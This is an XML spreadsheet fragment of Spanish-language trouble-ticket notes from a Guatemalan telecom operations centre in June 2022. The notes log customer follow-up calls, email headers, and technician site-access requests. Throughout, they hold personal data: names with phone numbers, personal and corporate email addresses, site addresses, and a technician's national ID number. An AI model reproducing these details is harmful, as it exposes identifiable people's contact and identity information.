PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ROBINSON ANDRE CASTILLO CARDONA &lt;ROBINSON.CASTILLO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; CAMILLO JOSE ALEMAN ENRIQUEZ &lt;CAMILLO.ALEMAN@CLARO.COM.GT&gt;
ASUNTO: RE: CLIENTE BANRURAL ID AFECTADO (8901473)
BUENA TARDE
SE BRINDA ACCESO EN HORARIO DE 8:00 A 17:00 HRS.
*-*-*-*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 INDICA QUE AHORITA ESTARA RESPONDIENDO CORREO PARA QUE LE DEN ACCESO AL TECNICO**
-ID 2001744856
**</t>
  </si>
  <si>
    <t>F4620174</t>
  </si>
  <si>
    <t>**SE LLAMA A FERNANDO CASTRO AL NUMERO  42271739 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001742078
**</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE  FERNANDO CASTRO AL NUMERO 42271739 ID:2001909181
COMENTA QUE EL SERVICIO OK, AUTORIZA CIERRE | CL COMENTA QUE A VECES LE FALLA LA SEÑAL PERO ES CUANDO SE NUBLA, SE LE RECOMIENDA QUE LO REPORTE CUANDO FALLE YA QUE INDICA QUE POR EL MOMENTO LE FUNCIONA BIEN | SE NOTIFICA A MIGUELAN.RODRIGUEZ VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4620176</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KATHERINE ALAS 78686382 - 23479300 SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001747042 - 2001747684
**</t>
  </si>
  <si>
    <t>F4620179</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE AXEL RECINOS 40138806 NO RESONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001767969
**</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE AXEL RECINOS 40138806 NO RESONDE ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 2001748883
**</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE AXEL RECINOS 40138806 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001767969
**</t>
  </si>
  <si>
    <t>F4620185</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIO PEREZ 36571015 MENIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001719597</t>
  </si>
  <si>
    <t>F4620192</t>
  </si>
  <si>
    <t>CLEINTE NELSON ERNESTO CONTRERA-70740714 VALIDA ###VIVO</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA ## SE DIRIGE HACIA EQUIPOS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON ERNESTO CONTRERA-70740714</t>
  </si>
  <si>
    <t>F4620201</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOSA AL 55172816  - PBX: 2420 7200 EXT. 2413 NO RESPONDE SE INTENTARA LUEGO**
-ID 2001750208
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOSA AL 55172816 INDICA QUE AUN LO VE CAIDO || SE NOTIFICA A GESTOR **
-ID 2001768939
**</t>
  </si>
  <si>
    <t>F4620214</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO 51259264 MENCIONA QUE NO CUENTAN CON MUCHA SEÑAL EN PR
-ID 2001784947</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SRTA. FLOR DE MARIA ESQUITE 55867090 SE LE SOLICTA LLAMAR A SU CENTRAL PARA VALIDAR EL FUNCIONAMIENTO CORRECTO A NIVEL APLICATIVO DE SU SISTEMA, TOMAR EN CUENTA QUE A NIVEL DE CLARO ESTOS ENLACES 3G/LTE ESTAN FUNCIONANDO CORRECTAMENTE. SE LLAMARA MAÑANA A LAS 09:00 AM NUEVAMENTE PARA CONFIRMAR SI LOGRO COMUNICACION CON SU CENTRAL EN ESPECIFICO CON SR. CL RONI GUANDALINI  24119191 EXT 10592.</t>
  </si>
  <si>
    <t xml:space="preserve"> SE HABLO CON CLIENTE SRTA. FLOR DE MARIA ESQUITE 55867090  SE LE INFORMA QUE YA ESTAMOS TRABAJANDO CON LA CENTRAL, SE DETERMINA QUE SU SISTEMA NO ES COMPATIBLE CON LA SOLUCION 3G/LTE, ESTAMOS A LA ESPERA QUE LA CENTRAL VALIDA LOS REQUISITOS MINIMOS PARA QUE PUEDA FUNCIONAR CON ESTA SOLUCION DE APN, ENLACE A NIVEL DE CLARO FUNCIONANDO CORRECTAMENTE. SE LE LLAMARA A LAS 3PM PARA INFORMAR SI SE TIENE ESA INFORMACION DE LA CENTRAL.</t>
  </si>
  <si>
    <t>CLIENTE JUSTO OROZCO LLAMA DEL 51259264 ID 3001075226 PARA EL SEGUIMIENTO DEL CASO SD1139424 SE LE INFORMA QUE ES NECESARIO REALIZAR PRUEBAS YA QUE NO LE FUNCIONA SU SERVICIO, SE TRANSFIERE CON EL GESTOR A CARGO JHONNSER.ESCOBAR  AL 8126 ID 3001075757 ATIENDE FRANCISCO Y COMENTA QUE VA A TRANSFERIR A JHONSER QUIEN ESTA DISPONIBLE Y AL TRANSFERIRLO SE CORTA LA COMUNICACIÓN Y SE ESCALA CON KEVIN FONSECA AL 41284612 ID 3001076468 Y COMENTA QUE SE LLAME A LA EXT 5586 SE CONTACTA ID 3001077361 Y SE DEJA EN LINEA CON EL CLIENTE A LA ESPERA DE LOS AVANCES.</t>
  </si>
  <si>
    <t>F4620218</t>
  </si>
  <si>
    <t>*- ANTONI MONTUFAR 59234661 (CLIENTE) INFORMA QUE DE MOMENTO TODO OK, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4620221</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:29
PARA: JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DDJ SANTA ANA PALMAR ID: IP2165123
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4620226</t>
  </si>
  <si>
    <t>COORDINADA LA VISITA TÉCNICA PARA MAÑANA A LAS 08:30AM, PERSONAL DE OPERACIONES REGIÓN TAMBIÉN TRABAJARÁ DEL LADO DEL NODO A PARTIR DE LAS 07:00AM</t>
  </si>
  <si>
    <t>TICKET APERTURADO A SOLICITUD DE SOC CLARO; SE COORDINARÁ VISITA TÉCNICA A PR PARA CAMBIO DE EQUIPO; SE LLAMÓ A CLIENTE 25041690 PARA QUE NOS APOYE EN AUTORIZAR EL INGRESO A AGENCIA, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE O BIEN MAÑANA ANTES DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE PERSONAL TECNICO ANDY SAGASTUME 55650208 QUIEN INDICA QUE YA POSEE LOS RESPUESTOS, PERO QUE ESTA A 1 HORA DE AGENCIA,
SE LLAMA A PERSONAL EN SITIO REMOTO JULIO MARTINEZ, 42155133 QUIEN INDICA QUE LA AGENCIA YA SE ENCUENTRA CERRADA Y QUE HASTA EL DÍA DE MAÑANA ATIENDEN A LAS 8:30 HRS
SE PASA FALLA A ETAPA PC, YA SE TIENE EL REPUESTO PERO CLIENTE YA NO ATIENDE
3001026980
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 55650208
NÚMERO: 55650208
DURACIÓN: 0:13:18
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 55650208
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 29/06/2022 17:22:29
3001028589
COLA:
NOMBRE: A: 42155133
NÚMERO: 42155133
DURACIÓN: 0:02:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42155133
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 29/06/2022 17:19:32</t>
  </si>
  <si>
    <t>F4620233</t>
  </si>
  <si>
    <t>CRONO ANTERIOR INDICA ENLACE EN MONITOREO POR 24 HORAS, SE DEBE VALIDAR SERVICIO MAÑANA A LAS 11:30AM</t>
  </si>
  <si>
    <t>F4620236</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILMAR CHILEL 54748598 MENCIONA QUE YA LE ESTA DANDO SEGUIMIENTO CON SU IT
MENCIONA QUE LUEGO DE REALIZAR LAS PRUEBAS SI PERSISTE EL INCONVENIENTE VOLVERA A REPORTAR
-ID 2001780723</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GUILMAR CHILEL 54748598 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001745492</t>
  </si>
  <si>
    <t>F4620240</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE MIRANDA 8237-7124 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001726231
**</t>
  </si>
  <si>
    <t>F4620251</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN GABRIEL CALVO 70168949 - 44048222 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001813381 - 2001813505</t>
  </si>
  <si>
    <t>F4620258</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS JUAREZ AL 30296744 INDICA QUE NO ESTA EN SU OFICINA Y NO PUEDE VERIFICAR SOLICITA QUE SE LE LLAME A LAS 14:15 HRS **
-ID 3001360669
**</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON LUIS JUÁREZ/CLIENTE 30296744 INDICA QUE YA TIENE EL CORREO DE GESTIÓN N1 CON DATOS DE LOS TÉCNICOS/DPI; EN CUANTO TENGO EL VO.BO. RESPONDERÁ EL CORREO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, LUIS JUAREZ NÚMERO 30296744, A QUIEN SE LE INDICA QUE YA SE LE COMPARTIO LA INFORMACIÓN SOLICITADA , DE LOS DATSO DE LOS TÉCNICO JUNTO CON LAS IMAGENES DE LOS DPI, CLIENTE, COMENTA QUE DIRIGIRA EL CORREO PARA LA GESTION DEL PERMISOS Y QUE SE GESTIONARAN PARA EL DÍA VIERNES  , ASÍ MISMO SE SE SOLICITA DE FAVOR A CLIENTE QUE PUEDA CONFIRMAR EL HRARIO PARA QUE PUEDAN LLEGAR TÉCNICOS A SITO, CLIENTE CONFIRMA DE ENTERADO, E INDICA QUE EL DARÁ SEGUIMIENTO
RESULTADO: LLAMADA HECHA
NOMBRE: 30296744
NÚMERO: 011 50230296744
INICIO: HOY, 17:04
FIN: HOY, 17:06
DURACIÓN: 1:34
ID DE LLAMADA: 3001025944</t>
  </si>
  <si>
    <t>SE ENVÍA NUEVAMENTE CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO DE LOS TÉCNICOS ,ADICIONAL EN EL CORREO SE ADJUNTAN LAS IMAGENES DE LOS DPI DE LOS TÉCNICOS
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 17:28
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; LJUAREZ1@HOTMAIL.COM &lt;LJUAREZ1@HOTMAIL.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || 927700003T || DIRECCION GENERAL DEL SISTEMA PENITENCIARIO. || KM 5.5 FINAL COLONIA ATLANTIDA ZONA 18 CIUDAD DE GUATEMALA 14.66618 -90.4764
BUENA TARDE ESTIMANDO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  KM 5.5 FINAL COLONIA ATLANTIDA ZONA 18 CIUDAD DE GUATEMALA 14.66618 -90.4764
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS CON SUS RESPECTIVOS DPI
NOMBRE                                                IBM         DPI                                PLACA
IVAN ARRAZOLA                                 951013 2319 45019 0101   P-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QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE REENVIA CORREO  A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 10:19
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; LJUAREZ1@HOTMAIL.COM &lt;LJUAREZ1@HOTMAIL.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: GESTION DE PERMISOS || 927700003T || DIRECCION GENERAL DEL SISTEMA PENITENCIARIO. || KM 5.5 FINAL COLONIA ATLANTIDA ZONA 18 CIUDAD DE GUATEMALA 14.66618 -90.4764
*--*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAA A CLIENTE LUIS JUAREZ 30296744 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001378723</t>
  </si>
  <si>
    <t>F4620261</t>
  </si>
  <si>
    <t>SE VALIDA  QUE NO SE CUENTA CON RESPUESTA DE CLIENTE   SE LLAMA  NO SE LOGRA CONTACTAR  SE INTENTARA  LUEGO  |||  3001257933 | 3001257874
SOLICITUD DE ACCESOS || F4620261 || CALZ. MATEO FLORES 2 CALLE 34-43 ZONA 7 MULTIMAYOREO ROOSEVELTH ||</t>
  </si>
  <si>
    <t>PERSONAL TÉCNICO EN CLIENTE HACIENDO PRUEBAS CON LA NUEVA SIM; ADICIONAL SE HABLÓ CON OTTO PERALTA/CLIENTE 54136232 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>F4620288</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE-
RE: COMDATA EL SALVADOR</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:40
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; MARTA.MARINEZ@COMDATAGROUP.COM &lt;MARTA.MARINEZ@COMDATAGROUP.COM&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: COMDATA EL SALVADOR
*-*-*-*</t>
  </si>
  <si>
    <t>F4620312</t>
  </si>
  <si>
    <t>**SE LE LLAMA A ANDREA LAINEZ AL 56316761 NO RESPONDE ENVIA A BUZON,  SE INTENTARA LUEGO **
-ID 2001792038
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANDREA LAINEZ 56316761 MENCIONA QUE PERSISTE LA LENTITUD, INDICA QUE SE CONECTAN POR MEDIO DE WIFI
CLIENTE MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA SE DE SEGUIMIENTO MAÑANA A LAS 9:00
-ID 2001822506</t>
  </si>
  <si>
    <t>**SE LE LLAMA A ANDREA LAINEZ AL 56316761 SIGUE SIN  RESPONDER,  ENVIA A BUZON  SE INTENTARA LUEGO **
-ID 2001813036
**</t>
  </si>
  <si>
    <t>**SE LE LLAMA A ANDREA LAINEZ AL 56316761 SIGUE SIN  RESPONDER,  ENVIA A BUZON  SE INTENTARA LUEGO **
-ID 20017808764
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDREA LAINEZ 56316761  SOLICITA REALIZAR PRUEBAS YA QUE PERSISTE EL PROBLEMA DE LENTITUD || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 2001890447
**</t>
  </si>
  <si>
    <t>F4620337</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 17:56
PARA: SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; WILEY CACERES &lt;WILEY.C@ALLIEDGLOBAL.COM&gt;; KENRY GOMEZ &lt;KENRY.GM@ALLIEDGLOBAL.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; NETWORKING &lt;NETWORKING@ALLIEDGLOBAL.COM&gt;; NOC ALLIED GLOBAL &lt;NOC@ALLIEDGLOBAL.COM&gt;
CC: SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; FALLAS CC &lt;FALLASCC@CLARO.COM.HN&gt;; DUNIA ARACELY CERRATO AGUILAR &lt;DUNIA.CERRATO@CLARO.COM.HN&gt;; GESSLER JESUS ALFARO MURCIA &lt;GESSLER.ALFARO@CLARO.COM.HN&gt;; GEORGINA MELIZANDY MEJIA LOPEZ &lt;GEORGINA.MEJIA@CLARO.COM.HN&gt;; CRUZ MENCIAS, CARLOS FERNANDO &lt;CARLOS.CRUZ@CLARO.COM.HN&gt;
ASUNTO: RE: 1358954OH || ALLIED GLOBAL SD1139152
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4620370</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE ESPETI LUCERO 47401805 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 2001792647
**</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE ESPETI LUCERO 47401805 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001771582
**</t>
  </si>
  <si>
    <t>F4620373</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA TUCHAN 23370208  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001790840</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GLORIA TUCHAN AL 23370208 COMUNICA LA LLAMADA CON EL SEÑOR DANIEL QUIEN INDICA QUE HOY ESTARA REALIZANDO UNA REVISION A NIVEL LAN Y SOLICITA QUE SE LE LLAME DESPUES DE LAS 14:00 HRS **
-ID 2001871768
**</t>
  </si>
  <si>
    <t>F4620391</t>
  </si>
  <si>
    <t>CLIENTE GERSON PEREZ 50242165127 ES EL QUE ADMINISTRA LA PBX, INDICA QUE EL INCONVENIENTE ES QUE NO TIENEN LLAMADAS SALIENTES. CLIENTE APOYA REINICIANDO SU SERVIDOR DE LA PBX PERO INCONVENIENTE PERSISTE. INDICA QUE YA REINICIÓ EL EQUIPO DONDE SALE LA FIBRA, ACTUALMENTE NO TIENE A ALGUIEN EN SITIO PARA UBICAR EL EQUIPO FISICAMENTE, SE CONSULTARÁ SI CLIENTE NO TIENE ALGÚN TIPO DE BLOQUEO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4620407</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MARTINEZ 42126954 MENCIONA QUE RECIBIO EL CORREO
CLIENTE INDICA QUE ESTARA RESPONDIENDO CUANDO YA CUENTE CON LOS PERMISOS AUTORIZADOS
-ID 2001793646</t>
  </si>
  <si>
    <t>F4620415</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS FLORES 53825416 MENCIONA QUE PERSISTE EL INCONVENIETE PERO NO CUENTA CON EL NUMERO DE LA SIM
-ID 2001796295</t>
  </si>
  <si>
    <t>-* SE VALIDA QUE EQUIPO INSTALADO ES DE INNOVA, SE CONSULTA CON MELVIN CHACON 23049696 (SOPORTE INNOVA) INFORMA QUE VERIFICARA, SOLICITA SE LE LLAME A LAS 18:30 HRS -*
-*</t>
  </si>
  <si>
    <t>PR INDICÓ QUE EN SU MOMENTO NO CONTABA CON ENERGÍA ELÉCTRICA EN SECTOR, SE COORDINA VISITA TÉCNICA PARA MAÑANA A LAS 10:00AM A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4620416</t>
  </si>
  <si>
    <t>** SE HABLA CON CHRISTIAN BONILLA /JUAN CARLOS (CLIENTE) COMENTA QUE ESTABA REALIZANDO PRUEBAS CON GESTORA SIN EMBARGO SE CORTO LA LLAMADA POR LO QUE SOLICITA HABLAR NUEVAMENTE CON ELLA, SE HABLA CON MARLON RAMOS (GESTOR) SE REALIZA CONFERENCIA CON CLIENTE -*
*-*</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 42040157 PARA SEGUIMIENTO, NO CONTESTA, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4620433</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE RICARDO CASTILLO 76029460  INDICA QUE SE RETIRARON DE SUS LABORES A LAS 16:00 HORAS, SOLICITA SE LE LLAME MAÑANA A PARTIR DE LAS 8 AM PARA VALIDAR EQUIPOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4620450</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR CASTRO 72681515 MENCIONA QUE YA LE LLAMARON PARA EL SEGUIMIENTO, CLIENTE NO BRINDA INFORMACION
-ID 2001801807</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR CASTRO  AL 72681515 NO RESPONDE || SE INTENTARA LUEGO**
-ID 2001964192
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR CASTRO  AL 72681515 NO RESPONDE || SE INTENTARA LUEGO**
-ID 2001941844
**</t>
  </si>
  <si>
    <t>F4620451</t>
  </si>
  <si>
    <t>CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 28 DE JUNIO DE 2022 16:32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HERNANDEZ RIVERA, OSCAR ALONSO &lt;HERNANDEZ.OSCAR@CLARO.COM.SV&gt;; GRANADOS ALVARADO, NELIA GEORGINA &lt;GRANADOS.NELIA@CLARO.COM.SV&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARAMADO PARA CLIENTE "CC_BANCO_AGRICOLA_SV_IP200126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0451
ID: IP2001261
IDENTIFICADOR DEL CLIENTE:  CC_BANCO_AGRICOLA_SV_IP2001261
UBICADO EN:  ANTIGUO CUSCATLAN     FINCA EL ESPINO     AVENIDA CHILTIUPAN            LOTE 14         COM.URB.EL ESPINO/PUMA PEDREGA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4620452</t>
  </si>
  <si>
    <t>F4620453</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EVELIN GOMEZ AL 25553546 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001793153
**</t>
  </si>
  <si>
    <t>F4620460</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 8:49
PARA: APARTAMENTOS@VERNIM.GT &lt;APARTAMENTOS@VERNIM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: APARTAMENTOS VERNIM, SOCIEDAD ANONIMA || 604500001T || SD1139481
BUEN DÍA
   EN SEGUIMIENTO AL TICKET SD1139481 CON ID 604500001T SE REALIZA LA ENTREGA DE DICTAMEN TÉCNICO.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NINFA ESPADEROS 23647005 MENCIONA QUE AYER LE CONFIRMARON QUE A NIVEL DE CLARO HABIA INCONVENIENTE
SE LE MENCIONA QUE A NIVEL DE CLARO SE DETECTO UN REINICIO EN NUESTROS EQUIPOS Y SATURACION, CLIENTE INSISTE EN QUE LE INFORMARON QUE EL PROBLEMA ERA A NIVEL DE CLARO
SE LE INDICA QUE SE REALIZARA UN DICTAMEN TECNICO, CLIENTE ESTA DE ACUERDO
APARTAMENTOS@VERNIM.GT
-ID 2001882710</t>
  </si>
  <si>
    <t>**SE LE LLAMA A NINFA ESPADEROS AL NUMERO 23647005 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001868766 - 2001868830
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA ELABORACION DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 29 DE JUNIO DE 2022 9:13
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || APARTAMENTOS VERNIM || F4620460 || SD1139481
 BUEN DÍA
SOLICITO DE SU APOYO CON LA ELABORACION DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
APARTAMENTOS VERNIM S.A.
604500001T
F4620460 - SD1139481
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NINFA ESPADEROS 23647005 MENCIONA QUE AYER LE INDICARON QUE HABIA PROBLEMA A NIVEL DE CLARO, NO SE OBSERVA NINGUNA CRONOLOGIA CON DICHA INFORMACION
CLIENTE INDICA QUE ESTA OCUPADA POR LO QUE SOLICITA LLAMADA EN 30 MIN
-ID 2001872713</t>
  </si>
  <si>
    <t>F4620462</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 52 55 5174 5290 MENCIONA QUE ESTAN A LA ESPERA DE RESPUESTA POR PARTE DE CLIENTE
-ID 2001824936</t>
  </si>
  <si>
    <t>F4620472</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL RAMIREZ AL 78626575 76035206 CLIENTE CONFIRMA SERVICIO
 ESTABLE Y OPERATIVO **
-ID 2001796763 - 2001797003
**</t>
  </si>
  <si>
    <t>F4620484</t>
